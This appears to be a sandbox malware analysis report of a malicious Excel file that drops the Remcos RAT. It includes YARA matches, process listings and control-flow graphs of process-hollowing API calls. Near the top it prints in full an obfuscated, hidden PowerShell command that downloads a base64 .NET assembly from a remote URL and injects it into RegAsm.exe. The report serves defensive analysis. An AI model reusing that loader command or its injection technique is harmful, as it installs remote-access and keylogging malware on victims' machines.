                                                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $SHElLId[1]+$SHELlid[13]+'x') (('g6Wurl = f'+'q4'+'ht'+'t'+'p'+'s://'+'ra'+'w.g'+'ithubuserconten'+'t.co'+'m/'+'NoDetectOn'+'/NoDe'+'t'+'e'+'ct'+'O'+'n/re'+'fs/h'+'e'+'ads/m'+'ain'+'/Detah'+'Noth-V'+'.'+'txtfq4; g6Wb'+'a'+'se6'+'4Conte'+'nt '+'= '+'(New-O'+'bject '+'Sy'+'stem.Net.'+'WebClie'+'n'+'t).'+'Dow'+'n'+'lo'+'adStr'+'ing(g6Wur'+'l); g'+'6'+'Wb'+'i'+'nary'+'Cont'+'ent = [Sy'+'stem.'+'Conver'+'t]:'+':Fro'+'mB'+'ase'+'64Str'+'ing'+'(g'+'6'+'Wba'+'se64'+'Conten'+'t);'+' g6Wassembl'+'y = [Ref'+'le'+'ction.Ass'+'e'+'mbly]::Load'+'(g6W'+'binaryCo'+'ntent'+'); '+'[dn'+'lib.IO.'+'Home'+']'+'::VAI(r'+'aytx'+'t.'+'REEWR/'+'055'+'/84'+'1.23.'+'8'+'61.'+'40'+'1'+'//:ptthray, '+'ray'+'desativ'+'a'+'d'+'or'+'ay'+', '+'raydes'+'at'+'ivador'+'ay, rayde'+'s'+'a'+'tivad'+'oray, '+'r'+'ayR'+'egAsmray'+', ra'+'yra'+'y,rayray)').rEPLACe(([cHAr]114+[cHAr]97+[cHAr]121),[sTriNG][cHAr]34).rEPLACe(([cHAr]102+[cHAr]113+[cHAr]52),[sTriNG][cHAr]39).rEPLACe(([cHAr]103+[cHAr]54+[cHAr]87),[sTriNG][cHAr]36) )"
                                                                                                      Imagebase:0xc20000
                                                                                                      File size:427'008 bytes
                                                                                                      MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000E.00000002.474061036.0000000003389000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000E.00000002.474061036.0000000003389000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000E.00000002.474061036.0000000003389000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000E.00000002.474061036.0000000003389000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000E.00000002.476480463.00000000065E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000E.00000002.476480463.00000000065E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000E.00000002.476480463.00000000065E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000E.00000002.476480463.00000000065E1000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      Target ID:15
                                                                                                      Start time:06:51:55
                                                                                                      Start date:27/09/2024
                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                      Imagebase:0xd60000
                                                                                                      File size:64'704 bytes
                                                                                                      MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      Target ID:16
                                                                                                      Start time:06:51:56
                                                                                                      Start date:27/09/2024
                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                      Imagebase:0xd60000
                                                                                                      File size:64'704 bytes
                                                                                                      MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000010.00000002.1027741834.000000000239E000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000010.00000002.1027592173.0000000000891000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                      • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                      • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                      Reputation:high
                                                                                                      Has exited:false

                                                                                                      Call Graph

                                                                                                      • Entrypoint
                                                                                                      • Decryption Function
                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      • Show Help
                                                                                                      callgraph 1 Error: Graph is empty

                                                                                                      Module: Sheet1

                                                                                                      Declaration
                                                                                                      LineContent
                                                                                                      1

                                                                                                      Attribute VB_Name = "Sheet1"

                                                                                                      2

                                                                                                      Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                                                                      3

                                                                                                      Attribute VB_GlobalNameSpace = False

                                                                                                      4

                                                                                                      Attribute VB_Creatable = False

                                                                                                      5

                                                                                                      Attribute VB_PredeclaredId = True

                                                                                                      6

                                                                                                      Attribute VB_Exposed = True

                                                                                                      7

                                                                                                      Attribute VB_TemplateDerived = False

                                                                                                      8

                                                                                                      Attribute VB_Customizable = True

                                                                                                      Module: Sheet2

                                                                                                      Declaration
                                                                                                      LineContent
                                                                                                      1

                                                                                                      Attribute VB_Name = "Sheet2"

                                                                                                      2

                                                                                                      Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                                                                      3

                                                                                                      Attribute VB_GlobalNameSpace = False

                                                                                                      4

                                                                                                      Attribute VB_Creatable = False

                                                                                                      5

                                                                                                      Attribute VB_PredeclaredId = True

                                                                                                      6

                                                                                                      Attribute VB_Exposed = True

                                                                                                      7

                                                                                                      Attribute VB_TemplateDerived = False

                                                                                                      8

                                                                                                      Attribute VB_Customizable = True

                                                                                                      Module: Sheet3

                                                                                                      Declaration
                                                                                                      LineContent
                                                                                                      1

                                                                                                      Attribute VB_Name = "Sheet3"

                                                                                                      2

                                                                                                      Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                                                                      3

                                                                                                      Attribute VB_GlobalNameSpace = False

                                                                                                      4

                                                                                                      Attribute VB_Creatable = False

                                                                                                      5

                                                                                                      Attribute VB_PredeclaredId = True

                                                                                                      6

                                                                                                      Attribute VB_Exposed = True

                                                                                                      7

                                                                                                      Attribute VB_TemplateDerived = False

                                                                                                      8

                                                                                                      Attribute VB_Customizable = True

                                                                                                      Module: ThisWorkbook

                                                                                                      Declaration
                                                                                                      LineContent
                                                                                                      1

                                                                                                      Attribute VB_Name = "ThisWorkbook"

                                                                                                      2

                                                                                                      Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"

                                                                                                      3

                                                                                                      Attribute VB_GlobalNameSpace = False

                                                                                                      4

                                                                                                      Attribute VB_Creatable = False

                                                                                                      5

                                                                                                      Attribute VB_PredeclaredId = True

                                                                                                      6

                                                                                                      Attribute VB_Exposed = True

                                                                                                      7

                                                                                                      Attribute VB_TemplateDerived = False

                                                                                                      8

                                                                                                      Attribute VB_Customizable = True

                                                                                                      Reset < >
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.477664951.000000000015D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0015D000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_15d000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 34356779d64af44731db55822467abbaceb778812c94b3e31572b776cb912afe
                                                                                                        • Instruction ID: deb757396fa23c5db00d41d4eb8599c4b608f7270e807b92d1aab052847e722c
                                                                                                        • Opcode Fuzzy Hash: 34356779d64af44731db55822467abbaceb778812c94b3e31572b776cb912afe
                                                                                                        • Instruction Fuzzy Hash: 85018471504340EAE7244A15D884766BBD8DF81765F18C515EC694F2C2C379994ACBB1
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.477664951.000000000015D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0015D000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_15d000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 8a0cfdc9e27f758a913aa6602faaf4866217d2cb12aadf3d8e64652df6c0bfce
                                                                                                        • Instruction ID: 2846a8cf6f9af71225542327c78046e5895ef2b136ef57f6eebf1e14c87f698c
                                                                                                        • Opcode Fuzzy Hash: 8a0cfdc9e27f758a913aa6602faaf4866217d2cb12aadf3d8e64652df6c0bfce
                                                                                                        • Instruction Fuzzy Hash: E801527140D3C09FD7128B219C94752BFA4DF52625F19C1DBE8948F2D3C2695849C772

                                                                                                        Execution Graph

                                                                                                        Execution Coverage:11.1%
                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                        Signature Coverage:0%
                                                                                                        Total number of Nodes:158
                                                                                                        Total number of Limit Nodes:9
                                                                                                        execution_graph 9291 2a85a8 9292 2a85ea 9291->9292 9293 2a85f4 Wow64SetThreadContext 9291->9293 9292->9293 9294 2a8622 9293->9294 9295 2a8368 9296 2a83e3 CreateProcessW 9295->9296 9298 2a84c1 9296->9298 9299 360f70 9300 360f9b 9299->9300 9301 36107b 9299->9301 9300->9301 9304 2a5ec8 9300->9304 9309 2a5ea0 9300->9309 9306 2a5edb 9304->9306 9305 2a5f1c 9305->9301 9306->9305 9314 2a7228 9306->9314 9344 2a7167 9306->9344 9311 2a5edb 9309->9311 9310 2a5f1c 9310->9301 9311->9310 9312 2a7228 28 API calls 9311->9312 9313 2a7167 28 API calls 9311->9313 9312->9311 9313->9311 9315 2a7189 9314->9315 9317 2a7233 9314->9317 9316 2a71e1 9315->9316 9373 2a796a 9315->9373 9377 2a76d5 9315->9377 9381 2a7494 9315->9381 9385 2a75d1 9315->9385 9389 2a7990 9315->9389 9393 2a7bd3 9315->9393 9397 2a77dc 9315->9397 9401 2a765f 9315->9401 9405 2a775e 9315->9405 9409 2a7901 9315->9409 9413 2a7583 9315->9413 9417 2a7888 ResumeThread 9315->9417 9420 2a7c08 9315->9420 9424 2a7c75 9315->9424 9428 2a7bb4 9315->9428 9432 2a733d 9315->9432 9436 2a72fc 9315->9436 9440 2a7cb9 9315->9440 9444 2a7938 9315->9444 9448 2a76fa 9315->9448 9452 2a7726 9315->9452 9456 2a74a6 VirtualAllocEx 9315->9456 9460 2a7a26 9315->9460 9464 2a76a0 9315->9464 9468 2a7ae8 VirtualAllocEx 9315->9468 9472 2a732b 9315->9472 9316->9306 9317->9317 9349 2a7189 9344->9349 9345 2a71e1 9345->9306 9346 2a796a ResumeThread 9346->9349 9347 2a732b ResumeThread 9347->9349 9348 2a7ae8 2 API calls 9348->9349 9349->9345 9349->9346 9349->9347 9349->9348 9350 2a76a0 ResumeThread 9349->9350 9351 2a7a26 ResumeThread 9349->9351 9352 2a74a6 2 API calls 9349->9352 9353 2a7726 ResumeThread 9349->9353 9354 2a76fa ResumeThread 9349->9354 9355 2a7938 ResumeThread 9349->9355 9356 2a7cb9 ResumeThread 9349->9356 9357 2a72fc ResumeThread 9349->9357 9358 2a733d ResumeThread 9349->9358 9359 2a7bb4 ResumeThread 9349->9359 9360 2a7c75 ResumeThread 9349->9360 9361 2a7c08 ResumeThread 9349->9361 9362 2a7888 ResumeThread 9349->9362 9363 2a7583 ResumeThread 9349->9363 9364 2a7901 ResumeThread 9349->9364 9365 2a775e ResumeThread 9349->9365 9366 2a765f ResumeThread 9349->9366 9367 2a77dc ResumeThread 9349->9367 9368 2a7bd3 ResumeThread 9349->9368 9369 2a7990 ResumeThread 9349->9369 9370 2a75d1 ResumeThread 9349->9370 9371 2a7494 ResumeThread 9349->9371 9372 2a76d5 ResumeThread 9349->9372 9350->9349 9351->9349 9352->9349 9353->9349 9354->9349 9355->9349 9356->9349 9357->9349 9358->9349 9359->9349 9360->9349 9361->9349 9362->9349 9363->9349 9364->9349 9365->9349 9366->9349 9367->9349 9368->9349 9369->9349 9370->9349 9371->9349 9372->9349 9375 2a732d 9373->9375 9374 2a7888 ResumeThread 9374->9375 9375->9374 9376 2a72b1 9375->9376 9376->9315 9379 2a732d 9377->9379 9378 2a7888 ResumeThread 9378->9379 9379->9378 9380 2a72b1 9379->9380 9380->9315 9383 2a732d 9381->9383 9382 2a7888 ResumeThread 9382->9383 9383->9382 9384 2a72b1 9383->9384 9384->9315 9387 2a72b1 9385->9387 9388 2a732d 9385->9388 9386 2a7888 ResumeThread 9386->9388 9387->9315 9388->9386 9388->9387 9392 2a732d 9389->9392 9390 2a7888 ResumeThread 9390->9392 9391 2a72b1 9391->9315 9392->9389 9392->9390 9392->9391 9395 2a732d 9393->9395 9396 2a72b1 9393->9396 9394 2a7888 ResumeThread 9394->9395 9395->9394 9395->9396 9396->9315 9399 2a732d 9397->9399 9398 2a7888 ResumeThread 9398->9399 9399->9398 9400 2a72b1 9399->9400 9400->9315 9403 2a732d 9401->9403 9402 2a7888 ResumeThread 9402->9403 9403->9402 9404 2a72b1 9403->9404 9404->9315 9407 2a732d 9405->9407 9406 2a7888 ResumeThread 9406->9407 9407->9406 9408 2a72b1 9407->9408 9408->9315 9410 2a732d 9409->9410 9412 2a72b1 9409->9412 9411 2a7888 ResumeThread 9410->9411 9410->9412 9411->9410 9412->9315 9415 2a732d 9413->9415 9416 2a72b1 9413->9416 9414 2a7888 ResumeThread 9414->9415 9415->9414 9415->9416 9416->9315 9418 2a732d 9417->9418 9418->9417 9419 2a72b1 9418->9419 9419->9315 9422 2a732d 9420->9422 9421 2a7888 ResumeThread 9421->9422 9422->9421 9423 2a72b1 9422->9423 9423->9315 9426 2a732d 9424->9426 9425 2a7888 ResumeThread 9425->9426 9426->9425 9427 2a72b1 9426->9427 9427->9315 9430 2a732d 9428->9430 9429 2a7888 ResumeThread 9429->9430 9430->9429 9431 2a72b1 9430->9431 9431->9315 9434 2a732d 9432->9434 9433 2a7888 ResumeThread 9433->9434 9434->9433 9435 2a72b1 9434->9435 9435->9315 9439 2a7305 9436->9439 9437 2a7888 ResumeThread 9437->9439 9438 2a72b1 9438->9315 9439->9437 9439->9438 9443 2a732d 9440->9443 9441 2a72b1 9441->9315 9442 2a7888 ResumeThread 9442->9443 9443->9441 9443->9442 9446 2a732d 9444->9446 9445 2a7888 ResumeThread 9445->9446 9446->9445 9447 2a72b1 9446->9447 9447->9315 9450 2a732d 9448->9450 9449 2a7888 ResumeThread 9449->9450 9450->9449 9451 2a72b1 9450->9451 9451->9315 9454 2a732d 9452->9454 9453 2a7888 ResumeThread 9453->9454 9454->9453 9455 2a72b1 9454->9455 9455->9315 9458 2a732d 9456->9458 9457 2a7888 ResumeThread 9457->9458 9458->9457 9459 2a72b1 9458->9459 9459->9315 9462 2a732d 9460->9462 9461 2a7888 ResumeThread 9461->9462 9462->9461 9463 2a72b1 9462->9463 9463->9315 9466 2a732d 9464->9466 9467 2a72b1 9464->9467 9465 2a7888 ResumeThread 9465->9466 9466->9465 9466->9467 9467->9315 9470 2a732d 9468->9470 9469 2a7888 ResumeThread 9469->9470 9470->9469 9471 2a72b1 9470->9471 9471->9315 9474 2a732d 9472->9474 9473 2a7888 ResumeThread 9473->9474 9474->9473 9475 2a72b1 9474->9475 9475->9315 9476 2a8720 9477 2a8768 9476->9477 9478 2a8770 WriteProcessMemory 9476->9478 9477->9478 9479 2a87ab 9478->9479

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 0 360f70-360f95 1 36114b-361152 0->1 2 360f9b-360fa0 0->2 9 361154-36119b 1->9 10 3610df-3610e3 1->10 3 360fa2-360fa8 2->3 4 360fb8-360fc4 2->4 5 360fac-360fb6 3->5 6 360faa 3->6 14 3610e6-3610f0 4->14 15 360fca-360fcd 4->15 5->4 6->4 11 3611a1-3611a6 9->11 12 36139e-3613cc 9->12 16 3611be-3611c2 11->16 17 3611a8-3611ae 11->17 47 3613d2-3613f7 12->47 48 36241e-36244d 12->48 18 3610f2-3610fb 14->18 19 3610fe-361104 14->19 15->14 20 360fd3-360fda 15->20 25 361347-361351 16->25 26 3611c8-3611ca 16->26 21 3611b2-3611bc 17->21 22 3611b0 17->22 23 361106-361108 19->23 24 36110a-361116 19->24 20->1 28 360fe0-360fe5 20->28 21->16 22->16 29 361118-361148 23->29 24->29 32 361353-36135a 25->32 33 36135d-361363 25->33 30 3611cc-3611d8 26->30 31 3611da 26->31 34 360fe7-360fed 28->34 35 360ffd-361001 28->35 39 3611dc-3611de 30->39 31->39 41 361365-361367 33->41 42 361369-361375 33->42 43 360ff1-360ffb 34->43 44 360fef 34->44 35->14 36 361007-361009 35->36 36->14 45 36100f-361013 36->45 39->25 49 3611e4-361203 39->49 50 361377-36139b 41->50 42->50 43->35 44->35 45->14 52 361019-36101d 45->52 47->48 63 3613fd-36141c 47->63 60 362474-36247e 48->60 61 36244f-362453 48->61 70 361205-361211 49->70 71 361213 49->71 52->14 55 361023-361027 52->55 55->14 62 36102d-361031 55->62 67 362480-362486 60->67 68 362489-36248f 60->68 61->60 65 362455-36245c 61->65 62->14 66 361037-36103b 62->66 63->48 78 361422-361457 63->78 74 3624c1-3624c6 65->74 75 36245e-36246e 65->75 66->14 76 361041-361045 66->76 72 362495-3624a1 68->72 73 362491-362493 68->73 79 361215-361217 70->79 71->79 80 3624a3-3624be 72->80 73->80 74->75 75->60 76->14 81 36104b-361072 76->81 78->48 89 36145d-361482 78->89 79->25 83 36121d-361221 79->83 286 361075 call 2a5ec8 81->286 287 361075 call 2a5ea0 81->287 83->25 86 361227-36122b 83->86 90 36123e 86->90 91 36122d-36123c 86->91 89->48 100 361488-3614ad 89->100 92 361240-361242 90->92 91->92 92->25 96 361248-36124c 92->96 93 36107b-361082 97 361084-361087 93->97 98 361089-3610d7 93->98 96->25 101 361252-361271 96->101 99 3610dc 97->99 98->99 99->10 100->48 106 3614b3-3614d8 100->106 110 361273-361279 101->110 111 361289-361294 101->111 106->48 114 3614de-361503 106->114 115 36127d-36127f 110->115 116 36127b 110->116 112 361296-361299 111->112 113 3612a3-3612bf 111->113 112->113 117 3612c1-3612d4 113->117 118 3612dc-3612e6 113->118 114->48 125 361509-36152e 114->125 115->111 116->111 117->118 120 3612ea-361338 118->120 121 3612e8 118->121 123 36133d-361344 120->123 121->123 125->48 129 361534-361559 125->129 129->48 133 36155f-361584 129->133 133->48 137 36158a-3615af 133->137 137->48 140 3615b5-3615da 137->140 140->48 142 3615e0-361605 140->142 142->48 144 36160b-361630 142->144 144->48 146 361636-36165b 144->146 146->48 148 361661-361686 146->148 148->48 150 36168c-3616b1 148->150 150->48 152 3616b7-3616dc 150->152 152->48 154 3616e2-361707 152->154 154->48 156 36170d-361732 154->156 156->48 158 361738-361765 156->158 158->48 160 36176b-361790 158->160 160->48 162 361796-3617bb 160->162 162->48 164 3617c1-3617e6 162->164 164->48 166 3617ec-361811 164->166 166->48 168 361817-36183c 166->168 168->48 170 361842-361867 168->170 170->48 172 36186d-361892 170->172 172->48 174 361898-36241d 172->174 286->93 287->93
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.473420757.0000000000360000.00000040.00000800.00020000.00000000.sdmp, Offset: 00360000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_360000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: <3$ <3$ <3$L4#p$L4#p$L4#p
                                                                                                        • API String ID: 0-2298621963
                                                                                                        • Opcode ID: 93a947214e073e84d16b66c2898c67bfd151c8371edf7f4dca8b0c31f2c36ee5
                                                                                                        • Instruction ID: ca33591110367a1599b0c8cbe93a273ce41f09a75847e6617722fce690f73806
                                                                                                        • Opcode Fuzzy Hash: 93a947214e073e84d16b66c2898c67bfd151c8371edf7f4dca8b0c31f2c36ee5
                                                                                                        • Instruction Fuzzy Hash: 73E23938A002149FDB55DF14C890AAAF7B6FF89314F25C599EC1997355CB32AE82CF90

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 288 3625c8-3625da 289 3625e0-3625e5 288->289 290 362709-362742 288->290 291 3625e7-3625ed 289->291 292 3625fd-36260a 289->292 299 362802-36287c 290->299 300 362748-362759 290->300 293 3625f1-3625fb 291->293 294 3625ef 291->294 292->290 295 362610-362617 292->295 293->292 294->292 297 36262f-36263e 295->297 298 362619-36261f 295->298 297->290 303 362644-36264b 297->303 301 362623-362625 298->301 302 362621 298->302 334 36287e-36288c 299->334 335 3628a9-3628ae 299->335 309 362773-362790 300->309 310 36275b-362761 300->310 301->297 302->297 305 362663-36267c 303->305 306 36264d-362653 303->306 305->290 319 362682-362687 305->319 311 362657-362659 306->311 312 362655 306->312 309->299 321 362792-3627b4 309->321 314 362765-362771 310->314 315 362763 310->315 311->305 312->305 314->309 315->309 322 36269f-3626b8 319->322 323 362689-36268f 319->323 331 3627b6-3627bc 321->331 332 3627ce-3627e6 321->332 353 3626bb call 2a2c88 322->353 354 3626bb call 2a2f78 322->354 355 3626bb call 2a2f1e 322->355 356 3626bb call 2a32a2 322->356 357 3626bb call 2a2c80 322->357 358 3626bb call 2a2e40 322->358 359 3626bb call 2a3191 322->359 325 362693-36269d 323->325 326 362691 323->326 325->322 326->322 336 3627c0-3627cc 331->336 337 3627be 331->337 341 3627f4-3627ff 332->341 342 3627e8-3627ea 332->342 333 3626bd-3626c6 333->290 339 3626c8-3626cd 333->339 350 362894-3628a3 334->350 335->334 336->332 337->332 343 3626e5-3626fc 339->343 344 3626cf-3626d5 339->344 342->341 352 362701-362708 343->352 347 3626d7 344->347 348 3626d9-3626e3 344->348 347->343 348->343 350->335 353->333 354->333 355->333 356->333 357->333 358->333 359->333
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.473420757.0000000000360000.00000040.00000800.00020000.00000000.sdmp, Offset: 00360000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_360000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: $;3$$;3
                                                                                                        • API String ID: 0-3184832434
                                                                                                        • Opcode ID: ae324355c558c11ff3bff16df4363a0ccfcef768f75528a3f0908e83f8454f30
                                                                                                        • Instruction ID: a7865d9c5bbd2320bfd500bca0ffa8cc42ab5f9e7ffea2fcddef677b5529a0e4
                                                                                                        • Opcode Fuzzy Hash: ae324355c558c11ff3bff16df4363a0ccfcef768f75528a3f0908e83f8454f30
                                                                                                        • Instruction Fuzzy Hash: 5191D174B056448FD722DB64C890B6BBBE2EF85700F2AC1AAE4099F296DB71DC41C761

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 360 3609e5-3609e8 361 3609ee-3609f6 360->361 362 3609ea-3609ec 360->362 363 360a0e-360a12 361->363 364 3609f8-3609fe 361->364 362->361 365 360b73-360b7d 363->365 366 360a18-360a1c 363->366 367 360a02-360a0c 364->367 368 360a00 364->368 371 360b7f-360b88 365->371 372 360b8b-360b91 365->372 369 360a1e-360a2d 366->369 370 360a2f 366->370 367->363 368->363 373 360a31-360a33 369->373 370->373 375 360b97-360ba3 372->375 376 360b93-360b95 372->376 373->365 378 360a39-360a59 373->378 377 360ba5-360bc3 375->377 376->377 384 360a5b-360a76 378->384 385 360a78 378->385 386 360a7a-360a7c 384->386 385->386 386->365 387 360a82-360a84 386->387 389 360a86-360a92 387->389 390 360a94 387->390 391 360a96-360a98 389->391 390->391 391->365 393 360a9e-360abe 391->393 396 360ad6-360ada 393->396 397 360ac0-360ac6 393->397 400 360af4-360af8 396->400 401 360adc-360ae2 396->401 398 360aca-360acc 397->398 399 360ac8 397->399 398->396 399->396 404 360aff-360b01 400->404 402 360ae6-360af2 401->402 403 360ae4 401->403 402->400 403->400 406 360b03-360b09 404->406 407 360b19-360b70 404->407 408 360b0d-360b0f 406->408 409 360b0b 406->409 408->407 409->407
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.473420757.0000000000360000.00000040.00000800.00020000.00000000.sdmp, Offset: 00360000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_360000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: l;3$l;3
                                                                                                        • API String ID: 0-3032041684
                                                                                                        • Opcode ID: 49fc3150dded70e9d18fe2373d14eaed89704f5a468eecf8c06111efc5e1f118
                                                                                                        • Instruction ID: 086e0b12aae1d30a1b60980b94e81077d21fdafa135c7f26aca1df00699326ad
                                                                                                        • Opcode Fuzzy Hash: 49fc3150dded70e9d18fe2373d14eaed89704f5a468eecf8c06111efc5e1f118
                                                                                                        • Instruction Fuzzy Hash: EC413434700306CFDF2E5AB4D42267BB792AF90394B21C07AC4568B299EE75CD81C762

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 411 362820-36287c 416 36287e-36288c 411->416 417 3628a9-3628ae 411->417 420 362894-3628a3 416->420 417->416 420->417
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.473420757.0000000000360000.00000040.00000800.00020000.00000000.sdmp, Offset: 00360000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_360000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: $;3$$;3
                                                                                                        • API String ID: 0-3184832434
                                                                                                        • Opcode ID: e4712e388b11492f4ed085e23c2324cdb5d08cb1954e783ab49a42b8668eed39
                                                                                                        • Instruction ID: a2eb22209c753b09ed970c25059569ea069ef904e1c4cf6779ac4f9bf46cfad1
                                                                                                        • Opcode Fuzzy Hash: e4712e388b11492f4ed085e23c2324cdb5d08cb1954e783ab49a42b8668eed39
                                                                                                        • Instruction Fuzzy Hash: 9801D1787502586BEB2467748C95FAF5BD5AF98B00F118519F806AB3C1DDB1AD818321

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 421 2a7f7d-2a83e1 422 2a83e9-2a83f0 421->422 423 2a83e3-2a83e6 421->423 424 2a83fb-2a8411 422->424 425 2a83f2-2a83f8 422->425 423->422 426 2a841c-2a84bf CreateProcessW 424->426 427 2a8413-2a8419 424->427 425->424 429 2a84c8-2a8540 426->429 430 2a84c1-2a84c7 426->430 427->426 437 2a8552-2a8559 429->437 438 2a8542-2a8548 429->438 430->429 439 2a855b-2a856a 437->439 440 2a8570 437->440 438->437 439->440 442 2a8571 440->442 442->442
                                                                                                        APIs
                                                                                                        • CreateProcessW.KERNEL32(00000000,?,00000009,?,?,?,?,?,?,?), ref: 002A84AC
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.473368031.00000000002A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_2a0000_powershell.jbxd
                                                                                                        Similarity
